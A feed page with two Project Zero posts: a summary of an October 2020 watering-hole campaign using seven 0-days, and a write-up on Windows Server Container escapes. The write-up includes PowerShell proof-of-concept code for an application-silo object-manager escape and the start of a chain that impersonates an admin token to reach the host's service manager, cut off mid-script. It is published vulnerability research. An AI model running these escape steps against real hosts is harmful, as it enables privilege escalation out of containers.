❌

Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

In-the-Wild Series: October 2020 0-day discovery

By: Ryan
18 March 2021 at 16:45

Posted by Maddie Stone, Project Zero

In October 2020, Google Project Zero discovered seven 0-day exploits being actively used in-the-wild. These exploits were delivered via "watering hole" attacks in a handful of websites pointing to two exploit servers that hosted exploit chains for Android, Windows, and iOS devices. These attacks appear to be the next iteration of the campaign discovered in February 2020 and documented in this blog post series.

In this post we are summarizing the exploit chains we discovered in October 2020. We have already published the details of the seven 0-day vulnerabilities exploited in our root cause analysis (RCA) posts. This post aims to provide the context around these exploits.

What happened

In October 2020, we discovered that the actor from the February 2020 campaignΒ came back with the next iteration of their campaign: a couple dozen websitesΒ redirecting to an exploit server.Β Once our analysis began, we discoveredΒ links toΒ a second exploit server on the same website.Β After initial fingerprinting (appearing to be based on the origin of the IP address and the user-agent), an iframe was injected into the website pointing to one of the two exploit servers.Β 

In our testing, both of the exploit servers existed on all of the discovered domains. A summary of the two exploit servers is below:

Exploit server #1:

  • Initially responded to only iOS and Windows user-agents
  • Remained up and active for over a week from when we first started pulling exploits
  • Replaced the Chrome renderer RCE with a new v8 0-day (CVE-2020-16009) after the initial one (CVE-2020-15999) was patched
  • Briefly responded to Android user-agents after exploit server #2 went down (though we were only able to get the new Chrome renderer RCE)

Exploit server #2:

  • Responded to Android user-agents
  • Remained up and active for ~36 hours from when we first started pulling exploits
  • In our experience, responded to a much smaller block of IP addresses than exploit server #1

The diagram above shows the flow of a device connecting to one of the affected websites. The device is directed to either exploit server #1 or exploit server #2. The following exploits are then delivered based on the device and browser.

Exploit Server

Platform

Browser

Renderer RCE

Sandbox Escape

Local Privilege Escalation

1

iOS

Safari

Stack R/W via Type 1 Fonts (CVE-2020-27930)

Not needed

Info leak via mach message trailers (CVE-2020-27950)

Type confusion with turnstiles (CVE-2020-27932)

1

Windows

Chrome

Freetype heap buffer overflow

(CVE-2020-15999)

Not needed

cng.sysΒ heap buffer overflow (CVE-2020-17087)

1

Android

** Note: This was only delivered after #2 went down and CVE-2020-15999 was patched.

Chrome

V8 type confusion in TurboFan (CVE-2020-16009)

Unknown

Unknown

2

Android

Chrome

Freetype heap buffer overflow

(CVE-2020-15999)

Chrome for Android head buffer overflow (CVE-2020-16010)

Unknown

2

Android

Samsung Browser

Freetype heap buffer overflow

(CVE-2020-15999)

Chromium n-day

Unknown

All of the platforms employed obfuscation and anti-analysis checks, but each platform's obfuscation was different. For example, iOS is the only platform whose exploits were encrypted with ephemeral keys, meaning that the exploits couldn't be recovered from the packet dump alone, instead requiring an active MITM on our side to rewrite the exploit on-the-fly.

These operational exploits also lead us to believe that while the entities between exploit servers #1 and #2 are different, they are likely working in a coordinated fashion. Both exploit servers used the Chrome Freetype RCE (CVE-2020-15999) as the renderer exploit for Windows (exploit server #1) and Android (exploit server #2), but the code that surrounded these exploits was quite different. The fact that the two servers went down at different times also lends us to believe that there were two distinct operators.

The exploits

In total, we collected:

  • 1 full chain targeting fully patched Windows 10 using Google Chrome
  • 2 partial chainsΒ targeting 2 different fully patched Android devices running Android 10 using Google Chrome and Samsung Browser, and
  • RCE exploits for iOS 11-13 and privilege escalation exploit for iOS 13 (though the vulnerabilities were present up to iOS 14.1)

*Note: iOS, Android, and Windows were the only devices we tested while the servers were still active. The lack of other exploit chains does not mean that those chains did not exist.

The seven 0-days exploited by this attacker are listed below. We’ve provided the technical details of each of the vulnerabilities and their exploits in the root cause analyses.

We were not able to collect any Android local privilege escalations prior to exploit server #2 being taken down.Β Exploit server #1 stayedΒ up longer, and we were able to retrieve the privilege escalation exploits for iOS.

The vulnerabilities cover a fairly broad spectrum of issues - from a modern JIT vulnerability to a large cache of font bugs. Overall each of the exploits themselves showed an expert understanding of exploit development and the vulnerability being exploited. In the case of the Chrome Freetype 0-day, the exploitation method was novel to Project Zero. The process to figure out how to trigger the iOS kernel privilege vulnerability would have been non-trivial. The obfuscation methods were varied and time-consuming to figure out.

Conclusion

Project Zero closed out 2020 with lots of long days analyzing lots of 0-day exploit chains and seven 0-day exploits. When combined with their earlier 2020 operation, the actor used at least 11 0-days in less than a year. We are so thankful to all of the vendors and defensive response teams who worked their own long days to analyze our reports and get patches released and applied.

Who Contains the Containers?

By: Ryan
1 April 2021 at 16:06

Posted by James Forshaw, Project Zero

This is a short blog postΒ about a research project I conducted on Windows Server Containers that resulted in four privilege escalations which Microsoft fixed in March 2021. In the post, I describe what led to this research, my research process, and insights into what to look for if you’re researching this area.

Windows Containers Background

Windows 10 and its server counterparts added support for application containerization. The implementation in Windows is similar in concept to Linux containers, but of course wildly different. The well-known Docker platform supports Windows containers which leads to the availability of related projects such as Kubernetes running on Windows. You can read a bit of background on Windows containers on MSDN. I’m not going to go in any depth on how containers work in Linux as very little is applicable to Windows.

The primary goal of a container is to hide the real OS from an application. For example, in Docker you can download a standard container image which contains a completely separate copy of Windows. The image is used to build the container which uses a feature of the Windows kernel called a Server SiloΒ allowing for redirection of resources such as the object manager, registry and networking. The server silo is a special type of Job object, which can be assigned to a process.

Diagram of a server silo. Shows an application interacting with the registry, object manager and network and how being in the silo redirects that access to another location.

The application running in the container, as far as possible, will believe it’s running in its own unique OS instance. Any changes it makes to the system will only affect the container and not the real OS which is hosting it. This allows an administrator to bring up new instances of the application easily as any system or OS differences can be hidden.

For example the container could be moved between different Windows systems, or even to a Linux system with the appropriate virtualization and the application shouldn’t be able to tell the difference. Containers shouldn’t be confused with virtualization however, which provides a consistent hardware interface to the OS.Β A container is more about providing a consistent OS interface to applications.

Realistically, containers are mainly about using their isolation primitives for hiding the real OS and providing a consistent configuration in which an application can execute. However, there’s also some potential security benefit to running inside a container, as the application shouldn’t be able to directly interact with other processes and resources on the host.

There are two supported types of containers: Windows Server Containers and Hyper-V Isolated Containers. Windows Server Containers run under the current kernel as separate processes inside a server silo. Therefore a single kernel vulnerability would allow you to escape the container and access the host system.

Hyper-V Isolated Containers still run in a server silo, but do so in a separate lightweight VM. You can still use the same kernel vulnerability to escape the server silo, but you’re still constrained by the VM and hypervisor. To fully escape and access the host you’d need a separate VM escape as well.

Diagram comparing Windows Server Containers and Hyper-V Isolated Containers. The server container on the left directly accesses the hosts kernel. For Hyper-V the container accesses a virtualized kernel, which dispatches to the hypervisor and then back to the original host kernel. This shows the additional security boundary in place to make Hyper-V isolated containers more secure.

The current MSRC security servicing criteriaΒ states that Windows Server Containers are not a security boundary as you still have direct access to the kernel. However, if you use Hyper-V isolation, a silo escape wouldn’t compromise the host OS directly as the security boundary is at the hypervisor level. That said, escaping the server silo is likely to be the first step in attacking Hyper-V containers meaning an escape is still useful as part of a chain.

As Windows Server Containers are not a security boundary any bugs in the feature won’t result in a security bulletin being issued. Any issues might be fixed in the next major version of Windows, but they might not be.

Origins of the Research

Over a year ago I was asked for some advice by Daniel Prizmant,Β a researcher at Palo Alto NetworksΒ on some details around Windows object manager symbolic links. Daniel was doing research into Windows containers, and wanted help on a feature which allows symbolic links to be marked as global which allows them to reference objects outside the server silo. I recommend reading Daniel’s blog postΒ for more in-depth information about Windows containers.

Knowing a little bit about symbolic links I was able to help fill in some details and usage. About seven months later Daniel released a second blog post, this time describing how to use global symbolic links to escape a server silo Windows container. The result of the exploit is the user in the container can access resources outside of the container, such as files.

The global symbolic link feature needs SeTcbPrivilegeΒ to be enabled, which can only be accessed from SYSTEM. The exploit therefore involved injecting into a system process from the default administrator user and running the exploit from there. Based on the blog post, I thought it could be done easier without injection. You could impersonate a SYSTEM token and do the exploit all in process. I wrote a simple proof-of-concept in PowerShell and put it up on Github.

Fast forward another few months and a Googler reached out to ask me some questions about Windows Server Containers. Another researcher at Palo Alto Networks had reported to Google Cloud that Google Kubernetes Engine (GKE)Β was vulnerable to the issue Daniel had identified. Google Cloud was using Windows Server Containers to run Kubernetes, so it was possible to escape the container and access the host, which was not supposed to be accessible.

Microsoft had not patched the issue and it was still exploitable. They hadn’t patched it because Microsoft does not consider these issues to be serviceable. Therefore the GKE team was looking for mitigations. One proposed mitigation was to enforce the containers to run under the ContainerUser account instead of the ContainerAdministrator. As the reported issue only works when running as an administrator that would seem to be sufficient.

However, I wasn’t convinced there weren't similar vulnerabilities which could be exploited from a non-administrator user. Therefore I decided to do my own research into Windows Server Containers to determine if the guidance of using ContainerUser would really eliminate the risks.

While I wasn’t expecting MS to fix anything I found it would at least allow me to provide internal feedback to the GKE team so they might be able to better mitigate the issues. It also establishes a rough baseline of the risks involved in using Windows Server Containers. It’s known to be problematic, but how problematic?

Research Process

The first step was to get some code running in a representative container. Nothing that had been reported was specific to GKE, so I made the assumption I could just run a local Windows Server Container.

Setting up your own server silo from scratch is undocumented and almost certainly unnecessary. When you enable the Container support feature in Windows, the Hyper-V Host Compute Service is installed. This takes care of setting up both Hyper-V and process isolated containers. The API to interact with this service isn’t officially documented, however Microsoft has provided public wrappers (with scant documentation), for example this is the Go wrapper.

Realistically it’s best to just use DockerΒ which takes the MS provided Go wrapper and implements the more familiar Docker CLI. While there’s likely to be Docker-specific escapes, the core functionality of a Windows Docker container is all provided by Microsoft so would be in scope. Note, there are two versions of Docker: Enterprise which is only for server systems and Desktop. I primarily used Desktop for convenience.

As an aside, MSRC does not count any issue as crossing a security boundary where being a member of the Hyper-V AdministratorsΒ group is a prerequisite. Using the Hyper-V Host Compute Service requires membership of the Hyper-V AdministratorsΒ group. However Docker runs at sufficient privilege to not need the user to be a member of the group. Instead access to Docker is gated by membership of the separate docker-usersΒ group. If you get code running under a non-administrator user that has membership of theΒ docker-usersΒ group you can use that to get full administrator privileges by abusing Docker’s server silo support.

Fortunately for me most Windows Docker images come with .NET and PowerShell installed so I could use my existing toolset. I wrote a simple docker file containing the following:

FROM mcr.microsoft.com/windows/servercore:20H2

USER ContainerUser

COPY NtObjectManager c:/NtObjectManager

CMD [ "powershell", "-noexit", "-command", \

Β  "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]

This docker file will download a Windows Server Core 20H2 container image from the Microsoft Container Registry, copy in my NtObjectManager PowerShell module and then set up a command to load that module on startup. I also specified that the PowerShell process would run as the user ContainerUserΒ so that I could test the mitigation assumptions. If you don’t specify a user it’ll run as ContainerAdministrator by default.

Note, when using process isolation mode the container image version must match the host OS. This is because the kernel is shared between the host and the container and any mismatch between the user-mode code and the kernel could result in compatibility issues. Therefore if you’re trying to replicate this you might need to change the name for the container image.

Create a directory and copy the contents of the docker file to the filename dockerfileΒ in that directory. Also copy in a copy of my PowerShell moduleΒ into the same directory under the NtObjectManager directory. Then in a command prompt in that directory run the following commands to build and run the container.

C:\container> docker build -t test_image .

Step 1/4 : FROM mcr.microsoft.com/windows/servercore:20H2

Β ---> b29adf5cd4f0

Step 2/4 : USER ContainerUser

Β ---> Running in ac03df015872

Removing intermediate container ac03df015872

Β ---> 31b9978b5f34

Step 3/4 : COPY NtObjectManager c:/NtObjectManager

Β ---> fa42b3e6a37f

Step 4/4 : CMD [ "powershell", "-noexit", "-command", Β  "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]

Β ---> Running in 86cad2271d38

Removing intermediate container 86cad2271d38

Β ---> e7d150417261

Successfully built e7d150417261

Successfully tagged test_image:latest

C:\container> docker run --isolation=process -it test_image

PS>

I wanted to run code using process isolation rather than in Hyper-V isolation, so I needed to specify the --isolation=processΒ argument. This would allow me to more easily see system interactions as I could directly debug container processes if needed. For example, you can use Process Monitor to monitor file and registry access. Docker Enterprise uses process isolation by default, whereas Desktop uses Hyper-V isolation.

I nowΒ had a PowerShell console running inside the container as ContainerUser. A quick way to check that it was successful is to try and find the CExecSvc process, which is the Container Execution Agent service. This service is used to spawn your initial PowerShell console.

PS> Get-ProcessΒ -NameΒ CExecSvc

Handles Β NPM(K) Β  Β PM(K) Β  Β  Β WS(K) Β  Β  CPU(s) Β  Β  Id Β SI ProcessName

------- Β ------ Β  Β ----- Β  Β  Β ----- Β  Β  ------ Β  Β  -- Β -- -----------

Β  Β  Β 86 Β  Β  Β  6 Β  Β  1044 Β  Β  Β  5020 Β  Β  Β  Β  Β  Β  Β 4560 Β  6 CExecSvc

With a running container it was time to start poking around to see what’s available. The first thing I did was dump the ContainerUser’sΒ token just to see what groups and privileges were assigned. You can use the Show-NtTokenEffectiveΒ command to do that.

PS> Show-NtTokenEffectiveΒ -UserΒ -GroupΒ -Privilege

USER INFORMATION

----------------

Name Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Sid

---- Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  ---

User Manager\ContainerUser S-1-5-93-2-2

GROUP SID INFORMATION

-----------------

Name Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Attributes

---- Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  ----------

Mandatory Label\High Mandatory Level Β  Integrity, ...

Everyone Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Mandatory, ...

BUILTIN\Users Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β Mandatory, ...

NT AUTHORITY\SERVICE Β  Β  Β  Β  Β  Β  Β  Β  Β  Mandatory, ...

CONSOLE LOGON Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β Mandatory, ...

NT AUTHORITY\Authenticated Users Β  Β  Β  Mandatory, ...

NT AUTHORITY\This Organization Β  Β  Β  Β  Mandatory, ...

NT AUTHORITY\LogonSessionId_0_10357759 Mandatory, ...

LOCAL Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β Mandatory, ...

User Manager\AllContainers Β  Β  Β  Β  Β  Β  Mandatory, ...

PRIVILEGE INFORMATION

---------------------

Name Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β Luid Β  Β  Β  Β  Β  Β  Β Enabled

---- Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β ---- Β  Β  Β  Β  Β  Β  Β -------

SeChangeNotifyPrivilege Β  Β  Β  00000000-00000017 True

SeImpersonatePrivilege Β  Β  Β  Β 00000000-0000001D True

SeCreateGlobalPrivilege Β  Β  Β  00000000-0000001E True

SeIncreaseWorkingSetPrivilege 00000000-00000021 False

The groups didn’t seem that interesting, however looking at the privileges we have SeImpersonatePrivilege. If you have this privilege you can impersonate any other user on the system including administrators. MSRC considers having SeImpersonatePrivilege as administrator equivalent, meaning if you have it you can assume you can get to administrator. Seems ContainerUser is not quite as normal as it should be.

That was a very bad (or good) start to my research. The prior assumption was that running as ContainerUser would not grant administrator privileges, and therefore the global symbolic link issue couldn’t be directly exploited. However that turns out to not be the case in practice.Β As an example you can use the public RogueWinRM exploitΒ to get a SYSTEMΒ token as long as WinRM isn’t enabled, which is the case on most Windows container images. There are no doubt other less well known techniques to achieve the same thing. The code which creates the user account is in CExecSvc,Β which is code owned by Microsoft and is not specific to Docker.

NextI used the NtObjectΒ drive provider to list the object manager namespace. For example checking the Device directory shows what device objects are available.

PS> lsΒ NtObject:\Device

Name Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β TypeName

---- Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β --------

Ip Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β SymbolicLink

Tcp6 Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β SymbolicLink

Http Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β Directory

Ip6 Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  SymbolicLink

ahcache Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  SymbolicLink

WMIDataDevice Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  SymbolicLink

LanmanDatagramReceiver Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β SymbolicLink

Tcp Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  SymbolicLink

LanmanRedirector Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β SymbolicLink

DxgKrnl Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  SymbolicLink

ConDrv Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β SymbolicLink

Null Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β SymbolicLink

MailslotRedirector Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β SymbolicLink

NamedPipe Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Device

Udp6 Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β SymbolicLink

VhdHardDisk{5ac9b14d-61f3-4b41-9bbf-a2f5b2d6f182} SymbolicLink

KsecDD Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β SymbolicLink

DeviceApi Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  SymbolicLink

MountPointManager Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Device

...

Interestingly most of the device drivers are symbolic links (almost certainly global) instead of being actual device objects. But there are a few real device objects available. Even the VHD disk volume is a symbolic link to a device outside the container. There’s likely to be some things lurking in accessible devices which could be exploited, but I was still in reconnaissance mode.

What about the registry? The container should be providing its own Registry hives and so there shouldn’t be anything accessible outside of that. After a few tests I noticed something very odd.

PS> lsΒ HKLM:\SOFTWAREΒ |Β Select-ObjectΒ Name

Name

----

HKEY_LOCAL_MACHINE\SOFTWARE\Classes

HKEY_LOCAL_MACHINE\SOFTWARE\Clients

HKEY_LOCAL_MACHINE\SOFTWARE\DefaultUserEnvironment

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft

HKEY_LOCAL_MACHINE\SOFTWARE\ODBC

HKEY_LOCAL_MACHINE\SOFTWARE\OpenSSH

HKEY_LOCAL_MACHINE\SOFTWARE\Policies

HKEY_LOCAL_MACHINE\SOFTWARE\RegisteredApplications

HKEY_LOCAL_MACHINE\SOFTWARE\Setup

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node

PS> lsΒ NtObject:\REGISTRY\MACHINE\SOFTWAREΒ |Β Select-ObjectΒ Name

Name

----

Classes

Clients

DefaultUserEnvironment

Docker Inc.

Intel

Macromedia

Microsoft

ODBC

OEM

OpenSSH

Partner

Policies

RegisteredApplications

Windows

WOW6432Node

The first command is querying the local machine SOFTWARE hive using the built-in Registry drive provider. The second command is using my module’s object manager provider to list the same hive. If you look closely the list of keys is different between the two commands. Maybe I made a mistake somehow? I checked some other keys, for example the user hive attachment point:

PS> lsΒ NtObject:\REGISTRY\USERΒ |Β Select-ObjectΒ Name

Name

----

.DEFAULT

S-1-5-19

S-1-5-20

S-1-5-21-426062036-3400565534-2975477557-1001

S-1-5-21-426062036-3400565534-2975477557-1001_Classes

S-1-5-21-426062036-3400565534-2975477557-1003

S-1-5-18

PS> Get-NtSid

Name Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Sid

---- Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  ---

User Manager\ContainerUser S-1-5-93-2-2

No, it still looked wrong. The ContainerUser’s SID is S-1-5-93-2-2, you’d expect to see a loaded hive for that user SID. However you don’t see one, instead you see S-1-5-21-426062036-3400565534-2975477557-1001Β which is the SID of the user outside the container.

Something funny was going on. However, this behavior is something I’ve seen before. Back in 2016 I reported a bugΒ with application hives where you couldn’t open the \REGISTRY\AΒ attachment point directly, but you could if you opened \REGISTRYΒ then did a relative open to A. It turns out that by luck my registry enumeration code in the module’s drive provider uses relative opens using the native system calls, whereas the PowerShell built-in uses absolute opens through the Win32 APIs.Β Therefore, this was a manifestation of a similar bug: doing a relative open was ignoring the registry overlays and giving access to the real hive.

This grants a non-administrator user access to any registry key on the host, as long as ContainerUser can pass the key’sΒ access check. You could imagine the host storing some important data in the registry which the container can now read out, however using this to escape the container would be hard. That said, all you need to do is abuse SeImpersonatePrivilegeΒ to get administrator access and you can immediately start modifying the host’s registry hives.

The fact that I had two bugs in less than a day was somewhat concerning, however at least that knowledge can be applied to any mitigation strategy. I thought I should dig a bit deeper into the kernel to see what else I could exploit from a normal user.

A Little Bit of Reverse Engineering

While just doing basic inspection has been surprisingly fruitful it was likely to need some reverse engineering to shake out anything else. I know from previous experience on Desktop Bridge how the registry overlays and object manager redirection works when combined with silos. In the case of Desktop Bridge it uses application silos rather than server silos but they go through similar approaches.

The main enforcement mechanism used by the kernel to provide the container’s isolation is by calling a function to check whether the process is in a silo and doing something different based on the result. I decided to try and track down where the silo state was checked and see if I could find any misuse. You’d think the kernel would only have a few functions which would return the current silo state. Unfortunately you’d be wrong, the following is a short list of the functions I checked:

IoGetSilo, IoGetSiloParameters, MmIsSessionInCurrentServerSilo, OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO, ObGetSiloRootDirectoryPath, ObpGetSilosRootDirectory, PsGetCurrentServerSilo, PsGetCurrentServerSiloGlobals, PsGetCurrentServerSiloName, PsGetCurrentSilo, PsGetEffectiveServerSilo, PsGetHostSilo, PsGetJobServerSilo, PsGetJobSilo, PsGetParentSilo, PsGetPermanentSiloContext, PsGetProcessServerSilo, PsGetProcessSilo, PsGetServerSiloActiveConsoleId, PsGetServerSiloGlobals, PsGetServerSiloServiceSessionId, PsGetServerSiloState, PsGetSiloBySessionId, PsGetSiloContainerId, PsGetSiloContext, PsGetSiloIdentifier, PsGetSiloMonitorContextSlot, PsGetThreadServerSilo, PsIsCurrentThreadInServerSilo, PsIsHostSilo, PsIsProcessInAppSilo, PsIsProcessInSilo, PsIsServerSilo, PsIsThreadInSilo

Of course that’s not a comprehensive list of functions, but those are the ones that looked the most likely to either return the silo and its properties or check if something was in a silo. Checking the references to these functions wasn’t going to be comprehensive, for various reasons:

  1. We’re only checking for bad checks, not the lack of a check.
  2. The kernel has the structure type definition for the Job object which contains the silo, so the call could easily be inlined.
  3. We’re only checking the kernel, many of these functions are exported for driver use so could be called by other kernel components that we’re not looking at.

The first issue I found was due to a call to PsIsCurrentThreadInServerSilo. I noticed a reference to the function inside CmpOKToFollowLinkΒ which is a function that’s responsible for enforcing symlink checks in the registry. At a basic level, registry symbolic links are not allowed to traverse from an untrusted hive to a trusted hive.

For example if you put a symbolic link in the current user’s hive which redirects to the local machine hive the CmpOKToFollowLinkΒ will return FALSE when opening the key and the operation will fail. This prevents a user planting symbolic links in their hive and finding a privileged application which will write to that location to elevate privileges.

BOOLEAN CmpOKToFollowLink(PCMHIVE SourceHive,Β PCMHIVE TargetHive)Β {

Β  ifΒ (PsIsCurrentThreadInServerSilo()Β 

Β  Β  ||Β !TargetHive

Β  Β  ||Β TargetHive ==Β SourceHive)Β {

Β  Β  returnΒ TRUE;

Β  }

Β  ifΒ (SourceHive->Flags.Trusted)

Β  Β  returnΒ FALSE;

Β  // Check trust list.

}

Looking at CmpOKToFollowLinkΒ we can see where PsIsCurrentThreadInServerSiloΒ is being used. If the current thread is in a server silo then all links are allowed between any hives. The check for the trusted state of the source hive only happens after this initial check so is bypassed. I’d speculate that during development the registry overlays couldn’t be marked as trusted so a symbolic link in an overlay would not be followed to a trusted hive it was overlaying, causing problems. Someone presumably added this bypass to get things working, but no one realized they needed to remove it when support for trusted overlays was added.

To exploit this in a container I needed to find a privileged kernel component which would write to a registry key that I could control. I found a good primitive inside Win32k for supporting FlickInfo configuration (which seems to be related in some way to touch input, but it’s not documented). When setting the configuration Win32k would create a known key in the current user’s hive. I could then redirect the key creation to the local machine hive allowing creation of arbitrary keys in a privileged location. I don’t believe this primitive could be directly combined with the registry silo escape issue but I didn’t investigate too deeply. At a minimum this would allow a non-administrator user to elevate privileges inside a container, where you could then use registry silo escape to write to the host registry.

The second issue was due to a call to OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO. This function would get the root object manager namespace directory for a silo.

POBJECT_DIRECTORY OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(PEJOB Silo)Β {

Β  ifΒ (Silo)Β {

Β  Β  PPSP_STORAGE Storage =Β Silo->Storage;

Β  Β  PPSP_SLOT Slot =Β Storage->Slot[PsObjectDirectorySiloContextSlot];

Β  Β  ifΒ (Slot->Present)

Β  Β  Β  returnΒ Slot->Value;

Β  }

Β  returnΒ ObpRootDirectoryObject;

}

We can see that the function will extract a storage parameter from the passed-in silo, if present it will return the value of the slot. If the silo is NULL or the slot isn’t present then the global root directory stored in ObpRootDirectoryObject is returned. When the server silo is set up the slot is populated with a new root directory so this function should always return the silo root directory rather than the real global root directory.

This code seems perfectly fine, if the server silo is passed in it should always return the silo root object directory. The real question is, what silo do the callers of this function actually pass in? We can check that easily enough, there are only two callers and they both have the following code.

PEJOB silo =Β PsGetCurrentSilo();

Root =Β OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(silo);

Okay, so the silo is coming from PsGetCurrentSilo. What does that do?

PEJOB PsGetCurrentSilo()Β {

Β  PETHREAD Thread =Β PsGetCurrentThread();

Β  PEJOB silo =Β Thread->Silo;

Β  ifΒ (silo ==Β (PEJOB)-3)Β {

Β  Β  silo =Β Thread->Tcb.Process->Job;

Β  Β  while(silo)Β {

Β  Β  Β  ifΒ (silo->JobFlags &Β EJOB_SILO)Β {

Β  Β  Β  Β  break;

Β  Β  Β  }

Β  Β  Β  silo =Β silo->ParentJob;

Β  Β  }

Β  }

Β  returnΒ silo;

}

A silo can be associated with a thread, through impersonation or as can be one job in the hierarchy of jobs associated with a process. This function first checks if the thread is in a silo. If not, signified by the -3 placeholder, it searches for any job in the job hierarchy for the process for anything which has the JOB_SILOΒ flag set. If a silo is found, it’s returned from the function, otherwise NULL would be returned.

This is a problem, as it’s not explicitly checking for a server silo. I mentioned earlier that there are two types of silo, application and server. While creating a new server silo requires administrator privileges, creating an application silo requires no privileges at all. Therefore to trick the object manager to using the root directory all we need to do is:

  1. Create an application silo.
  2. Assign it to a process.
  3. Fully access the root of the object manager namespace.

This is basically a more powerful version of the global symlink vulnerability but requires no administrator privileges to function. Again, as with the registry issue you’re still limited in what you can modify outside of the containers based on the token in the container. But you can read files on disk, or interact with ALPC ports on the host system.

The exploit in PowerShell is pretty straightforward using my toolchain:

PS> $rootΒ = Get-NtDirectoryΒ "\"

PS> $root.FullPath

\

PS> $siloΒ =Β New-NtJobΒ -CreateSiloΒ -NoSiloRootDirectory

PS> Set-NtProcessJobΒ $siloΒ -Current

PS> $root.FullPath

\Silos\748

To test the exploit we first open the current root directory object and then print its full path as the kernel sees it. Even though the silo root isn’t really a root directory the kernel makes it look like it is by returning a single backslash as the path.

We then create the application silo using the New-NtJob command. You need to specify NoSiloRootDirectory to prevent the code trying to create a root directory which we don’t want and can’t be done from a non-administrator account anyway. We can then assign the application silo to the process.

Now we can check the root directory path again. We now find the root directory is really called \Silos\748Β instead of just a single backslash. This is because the kernel is now using the root root directory. At this point you can access resources on the host through the object manager.

Chaining the Exploits

We can now combine these issues together to escape the container completely from ContainerUser. First get hold of an administrator token through something like RogueWinRM, you can then impersonate it due to having SeImpersonatePrivilege. Then you can use the object manager root directory issue to access the host’s service control manager (SCM) using the ALPC port to create a new service. You don’t even need to copy an executable outside the container as the system volume for the container is an accessible device on the host we can just access.

As far as the host’s SCM is concerned you’re an administrator and so it’ll grant you full access to create an arbitrary service. However, when that service starts it’ll run in the host, not in the container, removing all restrictions. One quirk which can make exploitation unreliable is the SCM’s RPC handle can be cached by the Win32 APIs. If any connection is made to the SCM in any part of PowerShell before installing the service you will end up accessing the container’s SCM, not the hosts.

To get around this issue we can just access the RPC service directly using NtObjectManager’s RPC commands.

PS> $impΒ = $token.Impersonate()

PS> $sym_pathΒ =Β "$env:SystemDrive\symbols"

PS> mkdirΒ $sym_pathΒ |Β Out-Null

PS> $services_pathΒ =Β "$env:SystemRoot\system32\services.exe"

PS> $cmdΒ =Β 'cmd /C echo "Hello World" > \hello.txt'

# You can also use the following to run a container based executable.

#$cmd = Use-NtObject($f = Get-NtFile -Win32Path "demo.exe") {

# Β  "\\.\GLOBALROOT" + $f.FullPath

#}

PS> Get-Win32ModuleSymbolFileΒ -PathΒ $services_pathΒ -OutPathΒ $sym_path

PS> $rpcΒ =Β Get-RpcServerΒ $services_pathΒ -SymbolPathΒ $sym_pathΒ |Β 

Β  Β Select-RpcServerΒ -InterfaceIdΒ '367abb81-9844-35f1-ad32-98f038001003'

PS> $clientΒ =Β Get-RpcClientΒ $rpc

PS> $siloΒ =Β New-NtJobΒ -CreateSiloΒ -NoSiloRootDirectory

PS> Set-NtProcessJobΒ $siloΒ -Current

PS> Connect-RpcClientΒ $clientΒ -EndpointPathΒ ntsvcs

